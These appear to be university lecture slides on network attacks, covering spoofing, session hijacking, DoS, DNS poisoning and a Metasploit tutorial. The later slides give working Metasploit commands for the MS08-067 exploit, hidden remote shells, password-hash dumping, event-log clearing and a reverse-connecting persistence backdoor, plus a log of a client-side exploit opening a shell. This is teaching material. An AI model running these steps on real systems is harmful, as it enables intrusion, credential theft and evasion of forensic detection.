1. Attacks, Vulnerabilities and Exploits
Network Security
CPSC6128 – Lecture 3
Attacks, Vulnerabilities and Exploits 1

2. Network Attack Methodology
Recon – Information gathering
Scanning – Enumeration
Vulnerability Identification
Exploit
Gaining access
Elevating given access
Application/Web level attacks
Denial of Service (DOS)
Post Exploitation
Maintaining Access
Removing Forensic Evidence
Exfiltration
TODAY’S LECTURE 2

3. GENERAL NETWORK ATTACK TECHNIQUES

4. IP address spoofing (1) Attacker doesn’t want actions traced back
SA:
DA:
Attacker doesn’t want actions traced back
Simply re-configure IP address in Windows or Unix.
Or enter spoofed address in an application
e.g., decoy packets with Nmap

5. IP address spoofing (2) But attacker cannot interact with victim
SA:
DA:
SA:
DA:
attacker
victim
But attacker cannot interact with victim
Unless attacker is on path between victim and spoofed address

6. IP spoofing with TCP?
Can an attacker make a TCP connection to server with a spoofed IP address?
Not easy
Sequence Numbers are negotiated between sender and receiver to insure that packets are part of an established connection
If attacker can guess initial sequence number, can attempt to inject into the conversation
But TCP uses random initial sequence numbers
Poor implementations of TCP, however
can allow for the sequence #’s to be predictable

7. Defense: Egress/Ingress filtering
Egress Filtering x
Internet
222.22/16
Ingress Filtering x
Internet
222.22/16

8. Ingress Filtering: Upstream ISP (1)
12.12/24
BGP update:
12.12/24,
34.34/24
regional
ISP
34.34/24
tier-1 ISP
56.56/24
BGP update:
56.56/24,
78.78/24
regional
ISP
78.78/24

9. Ingress Filtering: Upstream ISP (2)
Filter all traffic but
12.12/24 and 34.34/24
12.12/24
BGP update:
12.12/24,
34.34/24
34.34/24
Filter all traffic but
56.56/24 and 78.78/24
56.56/24
BGP update:
56.56/24,
78.78/24
78.78/24

10. Ingress Filtering: Upstream ISP (3)
12.12/24
Filter all but
12.12/24 and 34.34/24
regional
ISP x
34.34/24
tier-1 ISP
Filter all but
56.56/24 and 78.78/24
56.56/24
regional
ISP
78.78/24

11. Ingress Filtering: Upstream ISP (4)
12.12/24
Filter all but
12.12/24 and 34.34/24
spoofed
packet gets
through!
regional
ISP
34.34/24
tier-1 ISP
Filter all but
56.56/24 and 78.78/24
56.56/24
regional
ISP
78.78/24

12. Ingress/Egress filtering: Summary
Effectiveness depends on widespread deployment at access ISPs
Deployment in upstream ISPs helps, but does not eliminate IP spoofing
Even if universally deployed at access, hacker can still spoof another address in its access network 12.12/24
See RFC 2827 “Network Ingress Filtering: Defeating DDoS”
Attacks

13. TCP Session Hijacking
A technique used to gain access to Internet servers
It was first used by Kevin Mitnick to gain access to Tsutomu Shimomura's workstation in 1995
Take control of one side of a TCP connection
Marriage of sniffing and spoofing
Alice telnet
“hi, I’m Alice”
Alice
Bob
Attacker

14. TCP Session Hijacking: Limitation
2. to resync, Alice
sends segment with
correct seq #
1. weird ACK # for data never sent
Alice
Bob
3. “thanks bob”
Attacker
Bob is getting segments
from attacker and Alice.
Source IP address same,
but seq #’s different.
Bob likely drops
connection.
Attacker’s solutions:
1) Overwrite IP-to-MAC ARP tables, then Alice’s segments will not reach Bob and vice-versa
2) DOS attack Alice so her machine won’t see erroneous replies from Bob
3) Older method was to use IP source routing to route packets back to attacker

15. Session hijacking: The details
Attacker and Alice are on the same network segment
where traffic passes from Alice to Bob, as well as to the attacker
Attacker can sniff the packets
And See TCP packets between Bob and Alice and their sequence numbers
Attacker jumps in, sending TCP packets to Bob
source IP address = Alice’s IP address
Bob now obeys commands sent by attacker, thinking they were sent by Alice
Principal defense
Encryption with authentication protocol
Attacker does not have keys to decrypt and insert meaningful traffic
How about Attacker and Alice are not on the same network Segment?
Very complex, please read the handout –TCP Session Hijacking
Tools used
Juggernaut (Linux)
Hunt (Unix based)
T-Sight (Windows OS)

16. HTTP Session Hijacking:
HTTP Session ID: ADEF78DDC543DDDE
Client
Web Server
HTTP Session ID: ADEF78DDC543DDDE
Attacker
Involves obtaining the HTTP Session ID
The ID can be found in cookies and URLs
Called Sidejacking if sniffed

17. Firesheep – HTTP Sidejacking ---Not downloaded, but handout.

18. Denial-of-Service Attacks
Prevent access by legitimate users or stop critical system processes
Vulnerability attack
Send a few crafted messages to target app that has vulnerability
Malicious messages called the “exploit”
Remotely stopping or crashing services
Connection flooding
Overwhelming connection queue with SYN flood
Bandwidth flooding attack
Overwhelming communications link with packets
Strength in flooding attack lies in volume rather than content

19. DoS and DDoS DoS: DDoS source of attack small # of nodes
source IP typically spoofed
DDoS
From thousands of nodes
IP addresses often not spoofed
Often implemented as a Botnet

20. Interlude: IP datagram format
32 bits
total datagram
length (bytes)
header length
(bytes)
head.
len
type of
service
ver
length
for
fragmentation/
reassembly
“type” of data
fragment
offset
16-bit identifier
flgs
max number
remaining hops
(decremented at
each router)
time to
live
upper
layer
Internet
checksum
32 bit source IP address
32 bit destination IP address
upper layer protocol
to deliver payload to
Options (if any)
data
(variable length,
typically a TCP
or UDP segment)

21. IP Fragmentation and ReassemblyID =x
offset =0
fragflag
length
=4000 =1
=1500
=185
=370
=1040
One large datagram becomes
several smaller datagrams
Example
4000 byte datagram
MTU = 1500 bytes
1480 bytes in data field
offset =
1480/8

22. DoS: examples of vulnerability attacks
Land:
sends spoofed packet with source and dest address/port the same
Ping of death:
sends oversized ping packet
Jolt2:
sends a stream of fragments, none of which have fragflag set to 0. Rebuilding consumes all processor capacity.
Teardrop, Newtear, Bonk, Syndrop:
tools send overlapping segments, that is, fragment offsets incorrect.
Patches fix the problem, but malformed packet attacks continue to be discovered.

23. Connection flooding: Overwhelming connection queue w/ SYN flood
Send SYN packet
Recall client sends SYN packet with initial seq. number when initiating a connection.
Allocate Memory
TCP on server machine allocates memory on its connection queue, to track the status of the new half-open connection.
Wait for ACK
For each half-open connection, server waits for ACK segment, using a timeout that is often > 1 minute
Attack
Send many SYN packets
Fill up connection queue with half-open connections
Can spoof source IP address
When connection queue is exhausted
no new connections can be initiated by legit users.

24. DoS: Overwhelming connection queue with SYN flood
Amateur attack:
SYNs with
Source IP = Alice
attacker
Connection queue
freed up with
RST segment
SYN-ACKs
victim
RST
Alice
Expert attack:
Use multiple source IP Addresses
Each from unresponsive addresses

25. SYN flood defense: SYN cookies (1)
Client
Web Server
SYN with ISNA
SYN-ACK with ISNB= cookie
When SYN segment arrives, server calculates function (hash) based on:
Source and destination IP addresses and port numbers, MSS (Max Segment Size) and a slowly incrementing timestamp
Hash Output 32 bits
Server uses resulting “cookie” for its initial seq # (ISN) in SYNACK
Server does not allocate anything to half-open connection:
Does not remember client’s ISN
Does not remember cookie

26. SYN flood defense: SYN cookies (2)
If SYN is legitimate
Client returns final ACK w/ Seq# = ISN(of server)+1
Server computes same function, verifies function = SEQ # in ACK segment
Legit connection established without the need for half-open connections
If SYN-flood attack with spoofed IP address
No ACK comes back to server for connection.
No problem
server is not waiting for an ACK and has no resources allocated

27. Another Attack: Overwhelming link bandwidth with packets
Attack traffic can be made similar to legitimate traffic, hindering detection.
Flow of traffic must consume target’s bandwidth resources
Attacker needs to engage more than one machine => DDoS
May be easier to get target to fill-up its upstream bandwidth: async access

28. Example: Distributed DoS
Attacker takes over many machines,
called “bots”. Potential bots are
machines with vulnerabilities.
bot
bot
attacker
Internet
bot
victim
bot processes wait
for command from
attacker to flood a target
bot

29. Example: LOIC (try it)

30. DDoS using DNS Server ----Amplification Attack
request
reply
request
DNS server
reply
request
attacker
reply
victim
DNS server
request
reply
Source IP = Victim’s IP
DNS server

31. DDoS: Amplification Attack
Spoof source IP address = victim’s IP
Goal:
generate lengthy or numerous replies for short requests: Amplification
Amplification Attack
can also be done with Web and other services

32. DDoS Defenses Don’t let your systems become bots
Keep systems patched up
Employ egress anti-spoof filtering on external router
Filter dangerous packets
To avoid vulnerability attacks
Using Intrusion prevention systems
Over-provisioning of resources
Abundant bandwidth
Large pool of servers
ISP needs abundant bandwidth too
Multiple ISPs
Signature and anomaly detection and filtering
Rate limiting
Limit # of packets sent from source to dest

33. DNS attacks Reflector attack Denying DNS service
Leverage DNS for attacks on arbitrary targets - DDOS
Denying DNS service
Stop DNS root servers
Stop top-level-domain servers (e.g. .com domain)
Stop local (default name servers)
Use fake DNS replies to redirect user
Poisoning DNS
Insert false resource records into various DNS caches
False records contain IP addresses operated by attackers

34. DDOS DNS Attack Against Root Servers Example
Oct 21, 2002
Ping packets sent from bots to the 13 DNS root servers
Goal: bandwidth flood servers
Minimize impact:
DNS caching
Rate limiting at upstream routers: filter ping when they arrive at an excessive rate
Root server attack is easy to defend
Download root server database to local (default) name servers
Not much data in root server; changes infrequently
Similar kind of attack attempted in March 2012

35. DNS attack: redirecting
network
attacker
client
local DNS
server
hub or
WiFi 1 2
Issues:
Must spoof IP address
Set to local DNS server (easy)
Must match reply ID with request ID
Easy
May need to stop reply from the local DNS server
harder
Client sends DNS query to its local DNS server; sniffed by attacker
Attacker responds with bogus DNS reply

36. Poisoning DNS Cache Poisoning
Attempt to put bogus records into DNS name server caches
Bogus records could point to attacker nodes
Attacker nodes could phish
But unsolicited replies are not accepted at a name server
Name servers use IDs in DNS messages to match replies to queries
So can’t just insert a record into a name server by sending a DNS reply message.
But can send a reply to a request.

37. Poisoning local DNS server
Local ISP DNS
Server for Client
Attacker
1. DNS query
3. DNS reply
2. iterative
DNS queries
authoritative
DNS for csu.edu
Client Connecting
Remotely to CSU
Goal: Put bogus IP address for poly.edu in local Berkeley DNS server
1) Attacker queries local DNS server
2) Local DNS makes iterative queries
3) Attacker waits for some time; sends a bogus reply, spoofing authoritative server for csu.edu.
csu = ColumbusState

38. Poisoning local DNS server (cont)
authoritative
DNS for csu.edu
Client Connecting
Remotely to CSU
DNS query
2. DNS response
Local ISP DNS
Server for Client
3. http connection to
DNS response can provide IP
address of malicious server!
Attacker

39. DNS Poisoning (cont) Issues:
Attacker needs to know sequence number in request message sent to upstream server
Not easy!
Attacker may need to stop upstream name server from responding
So that server under attack doesn’t get suspicious
Ping of death, DoS, overflows, etc

40. DNS attacks: Summary DNS
a critical component of the Internet infrastructure
But is surprisingly robust
DDoS attacks against root servers have been largely unsuccessful
Poisoning and redirecting attacks are difficult unless you can sniff DNS requests
And even so, may need to stop DNS servers from replying
DNS can be leveraged for reflection attacks against non-DNS nodes

41. TOOLS AND ATTACK IMPLEMENTATION

42. Vulnerability Scanners
a software bug or mis-configuration allowing for unauthorized access
Original vulnerability scanner
It was called SATAN (Security Admin Tool for Analyzing Networks)
Written by Dan Farmer in 1995 employed by SGI at the time
Very controversial when released
It eventually resulted in SGI firing Dan Farmer
Commercial scanners (currently)
ISS Internet Scanner
SAINT
Retina by eEye
Nessus by Tenable

43. Nessus Nessus project started by Renaud Deraison in 1998
Very popular vulnerability scanner
Oct 2005 founded Tenable security and changed to “closed source”
Still free but with limited signature set
OPEN-VAS is a fork of the original Nessus code
and is still open source at

44. Nessus Architecture

45. Nessus Plugin Selection

46. Nessus Scan Results

47. Web Vulnerability Scanners
Nikto
Most popular
Looks for default files and configs and well as server misconfiguration
Provides versioning information
Runs on Linux or Windows

48. Nikto

49. Exploits Bought and Sold

50. Exploitation Tools Immunity Canvas Core Impact Metasploit Commercial
Core Impact
Metasploit
Open Source:
recently acquired by Rapid7

51. Immunity Canvas Runs on Windows, OS X or Linux (Linux recommended)
Currently over 370 exploits with an average of 4 exploits added each month
Flexible payload options
Connect to sock or “call back”
MOSDEF session allows for arbitrary code execution
Can get screenshots, video, keylogging, etc.

52. Canvas Interface

53. Canvas Interface Red – Modules – Things that Canvas can do
Purple – Things that Canvas know about
Yellow – Status Window, what Canvas is currently doing

54. Canvas
Set Target

55. Canvas – Port Scan
Canvas has reconnaissance tools and vulnerability assessment tools built in
These can be supplemented by imports from other tools such as Nessus
Here we can see that the scan reveals the usual Windows ports open

56. Canvas – Exploits
Lets try a SMB exploit

57. Canvas – Launch Exploit

58. Canvas – Success We Have Shell!

59. The Metasploit Framework
Open Source Development Framework for
Penetration testing
Patch verification
Regression testing
Security Research
Runs on Linux, Mac OS X, BSD, Windows
Remote and local exploits
Browser exploits
Ability to create exploits
Developed by HD Moore
Recently “acquired” by Rapid7
All indications are that it will remain open source

60. Terms Vulnerability Exploit Payload Encoders Module Auxiliary Module
weakness in a system which allows an attacker to reduce the systems security posture
Exploit
Code which allows an attacker to take advantage of the vulnerability in the system
Payload
The code which is delivered by the exploit
This is the code which actually runs on the victim system
Post exploitation
Encoders
Way to obfuscate the payload code so that anti-virus and IDS won’t detect
Module
A small piece of code to that can be added to the Metasploit Framework to execute an attack
Auxiliary Module
other parts of Metasploit that aid in exploitation such as scanners

61. Why Metasploit Framework?
Individual exploit code hard to manage, update and customize
No code reuse
With a framework there is no need to customize exploits to match payload code
Mix and match exploits and payloads easily
Rapid development of new exploit code

62. Architecture Overview
Diagram by HDMoore/MSF
Security Tools
Web Services
Integration

63. Different types of Payload
Inline
A single payload containing the exploit and full shellcode for the selected task
Inline payloads are by design more stable than their counterparts because they contain everything all in one
However, some exploits won’t support the resulting size of these payloads
Staged
Many exploitable situations constrain how many bytes an attacker may load into one contiguous location in memory
One way to do interesting post exploitation in these situations is to deliver the payload in stages
Reverse
Instead of the attacker connecting to the payload on the exploited host
The payload on the exploited host connects back to the attacker
Good for inside firewalls.
NoNx
The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory.
In Windows, NX is implemented as Data Execution Prevention (DEP)
The Metasploit NoNX payloads are designed to circumvent DEP
PassiveX
A payload that can help in circumventing restrictive outbound firewalls
It does this by using an ActiveX control to create a hidden instance of Internet Explorer
Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses

64. More About Payloads (cont)
IPv6
IPv6 payload
designed to work over IPv6
Meterpreter
Short for Meta-Interpreter
an advanced, multi-faceted payload that operates via DLL injection
resides completely in the memory of the remote host
leaves no traces on the hard drive
making it very difficult to detect with conventional forensic techniques

65. Meterpreter Meta-Interpreter
Advanced payload which operates via DLL injection
Resides completely in memory
No hard disk writes at all
Scripts and plugins supported
Well supported and constant development
Encrypted communications between the attacker and payload
Remote command execution
In-memory process migration
Registry modifications
Pivoting
File system support and more

66. How it Works

67. Metasploit Interfaces
MSFGUI
MSFWeb
MSFCLI
MSFConsole
Armitage
MSFd

68. MsfConsole

69. MsfConsole Basics Interactive console for Metasploit
Tab completion (double tap) to help type
Can execute external commands
Most flexible interface

70. Directory Structure Modules Scripts Plugins External Data
What we will mainly be working with
Contain Exploits, auxiliary, encoders
Scripts
extension scripts
Typically from 3rd parties.
“run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts)
Plugins
location for your own exploits development
External
interfaces to external services such a serial port
Data
data source for exploits
dictionaries, wordlists, sql, snmp mibs, etc.

71. Modules Auxiliary Encoders Exploits Nops Post Payloads
tasks outside of direct exploitation such as port scanning, sniffing, etc
Encoders
various techniques for obfuscating payloads to avoid antivirus and IDS
Exploits
organized by OS
Ruby scripts containing the exploit code
Nops
nop sleds for various CPU architecture
Post
post exploitation scripts for data gather, exfiltration
Payloads
3 types (singles, stagers, stages)
OS specific

72. Exploitation Basics-search exploits
Identify vulnerability
based on recon and possible output from vulnerability scanner (Nessus)
Choose exploit
which can take advantage of that vulnerability
Use “search”
example using MS08-067
Play techno music in background 

73. Exploitation Basics—use exploits
“use” command followed by directory path
“use exploit/windows/smb/ms08_067_netapi”
Use tab completion
double tap
Display options required for exploit “show options”

74. Exploitation Basics—Set PAYLoad
Select PAYLOAD
to deliver after successful exploitation
Can use tab completion to show options
“set PAYLOAD windows/meterpreter/bind_tcp”
bind_tcp will listen for attacker to connect
Reverse payload will connect back to the attacker

75. Exploitation Basics—Set RHOST
“show options” now shows PAYLOAD options
“set” command will set the options
“set RHOST

76. Exploitation Basics –Finally, exploit
“exploit” to run exploit
Will open a session to target with prompt “meterpreter>”
“background” will send session to the background
“session –i 1” will return to the first session
“execute –f cmd.exe –i –H” will have remote shell

77. Now What? - Post Exploitation
Meterpreter Basics
Migrate
migrates the meterpreter DLL injection to a different process
Explorer.exe is a good choice
Sysinfo
displays information about the target system
Download
“download c:\\boot.ini” - downloads from the target machine
Note double slashes
Upload
“upload c:\\boot.ini c:\\windows\system32”, or “upload c:\\boot.ini yang”
uploads file to the target machine
Getuid
returns the userid (permissions) that meterpreter is running
Execute
“execute –f cmd.exe –i –H” runs command on the remote machine
“–i” runs the command interactively
“-H’ hides the process from user
hashdump
dumps the SAM database for offline cracking
Clearev
clears the windows events logs
MUCH MORE
See:

78. Pivoting
Using one compromised machine to further exploit other hosts or networks
Example would be a client side “drive by browser” attack
Once the attacker owns this machine inside the firewall
they can launch all further attacks from this compromised machine

79. Add Route to an exist session
Add route from attacker machine to remote network
“route add ”
adds a route to the remote network through meterpreter session 1
Further attacks to will traverse this session and the already exploited host

80. Persistence If remote target reboots
meterpreter session is lost
Might be ok if exploit is reliable
Just run again
However, this is usually not the case
Two ways to perform persistence with Meterpreter
Persistence script
Metsvc
Set up a backdoor at the remote machine use “run metsvc –A”
Remove backdoor use “run metsvc –r”

81. Persistence Script Creates persistent backdoor
which can be configured to connect back to attacker on system boot
Creates a vbs file and registry key
Can be uninstalled remotely
“run persistence –A –L c:\\windows\system32 –X –i 10 –p 443 –r ”

82. Metsvc backdoor Backdoor runs as a service on the target
Attacker can connect to it remotely
Less noisy compared to persistence script

83. “3rd Party” Rootkits Used for more advanced post exploitation
Hiding process, files, data exfil.
HackerDefender
written by Holy Father
Kernel mode rootkit
Holy Father offered custom builds of HD to bypass AV/IDS
Well understood – so we may use this in lab

84. Client Side Exploits
Network side exploits are becoming more and more rare
Attackers have moved to “client side” exploits
Client-side exploits leverage software/applications running on the target system
Browser based attacks are common
Java also significant attack vector

85. Example Client Side Exploit

86. Example Client Side Exploit
msf> exploit(apple_itunes_playlist) > exploit
[*] Started reverse handler
[*] Using URL:
[*] Server started.
[*] Exploit running as background job.
msf> exploit(apple_itunes_playlist) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened ( : > :1075)
msf> exploit(apple_itunes_playlist) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version ]
(C) Copyright Microsoft Corp.
C:\WINDOWS\System32\>

87. Armitage

88. Starting Type “armitage” from Backtrack Defaults ok
Will start Metasploit and auto connect. Click YES when prompted to start Metasploit

89. Scanning
Nmap built in
MSF scans are Metasploit built in scanning modules. Generally Nmap is better
All found targets are automatically added to the target window

90. Exploitation
Apply “Find Attack” either by Port or by Vulnerability first
Right click target will bring up possible exploits
Can also specify exploits and modules from the right hand menu

91. Exploitation When host is compromised it appears RED with Lighting
Select “Interact”, then Command Shell access

92. Next Time
Covering your tracks….